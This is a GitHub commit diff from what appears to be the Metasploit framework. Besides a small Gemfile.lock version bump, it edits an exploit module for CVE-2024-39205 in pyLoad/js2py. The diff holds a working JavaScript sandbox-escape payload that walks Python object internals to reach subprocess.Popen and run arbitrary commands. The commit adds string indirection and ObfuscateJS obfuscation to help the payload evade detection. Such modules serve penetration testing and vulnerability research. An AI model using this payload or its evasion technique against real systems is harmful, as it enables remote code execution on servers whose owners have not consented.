Skip to content

Commit 4e1f333

Browse files
jheysel-r7jheysel-r7
committed
Ofuscation and Gemfile update
1 parent 2ba8a6c commit 4e1f333

File tree

2 files changed

+16
-7
lines changed

2 files changed

+16
-7
lines changed

Gemfile.lock

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -439,7 +439,7 @@ GEM
439439
rex-random_identifier
440440
rex-text
441441
ruby-rc4
442-
rex-random_identifier (0.1.12)
442+
rex-random_identifier (0.1.13)
443443
rex-text
444444
rex-registry (0.1.5)
445445
rex-rop_builder (0.1.5)

modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb

Lines changed: 15 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -115,21 +115,24 @@ def exploit
115115
def javascript_payload(cmd)
116116
js_vars = Rex::RandomIdentifier::Generator.new({ language: :javascript })
117117

118-
<<~EOS
118+
js = <<~EOS
119119
let #{js_vars[:command]} = "#{cmd}"
120120
let #{js_vars[:hacked]}, #{js_vars[:bymarve]}, #{js_vars[:n11]}
121121
let #{js_vars[:getattr]}, #{js_vars[:obj]}
122122
123+
#{js_vars[:base]} = '__base__'
124+
#{js_vars[:getattribute]} = '__getattribute__'
123125
#{js_vars[:hacked]} = Object.getOwnPropertyNames({})
124-
#{js_vars[:bymarve]} = #{js_vars[:hacked]}.__getattribute__
126+
#{js_vars[:bymarve]} = #{js_vars[:hacked]}[#{js_vars[:getattribute]}]
125127
#{js_vars[:n11]} = #{js_vars[:bymarve]}("__getattribute__")
126-
#{js_vars[:obj]} = #{js_vars[:n11]}("__class__").__base__
127-
#{js_vars[:getattr]} = #{js_vars[:obj]}.__getattribute__
128+
#{js_vars[:obj]} = #{js_vars[:n11]}("__class__")[#{js_vars[:base]}]
129+
#{js_vars[:getattr]} = #{js_vars[:obj]}[#{js_vars[:getattribute]}]
130+
#{js_vars[:sub_class]} = '__subclasses__';
128131
129132
function #{js_vars[:findpopen]}(#{js_vars[:o]}) {
130133
let #{js_vars[:result]};
131-
for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
132-
let #{js_vars[:item]} = #{js_vars[:o]}.__subclasses__()[#{js_vars[:i]}]
134+
for(let #{js_vars[:i]} in #{js_vars[:o]}[#{js_vars[:sub_class]}]()) {
135+
let #{js_vars[:item]} = #{js_vars[:o]}[#{js_vars[:sub_class]}]()[#{js_vars[:i]}]
133136
if(#{js_vars[:item]}.__module__ == "subprocess" && #{js_vars[:item]}.__name__ == "Popen") {
134137
return #{js_vars[:item]}
135138
}
@@ -141,6 +144,12 @@ def javascript_payload(cmd)
141144
142145
#{js_vars[:n11]} = #{js_vars[:findpopen]}(#{js_vars[:obj]})(#{js_vars[:command]}, -1, null, -1, -1, -1, null, null, true).communicate()
143146
EOS
147+
148+
opts = { "Strings" => true }
149+
150+
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
151+
js.obfuscate(memory_sensitive: true)
152+
js.to_s
144153
end
145154

146155
def execute_command(cmd, _opts = {})

0 commit comments

Comments
 (0)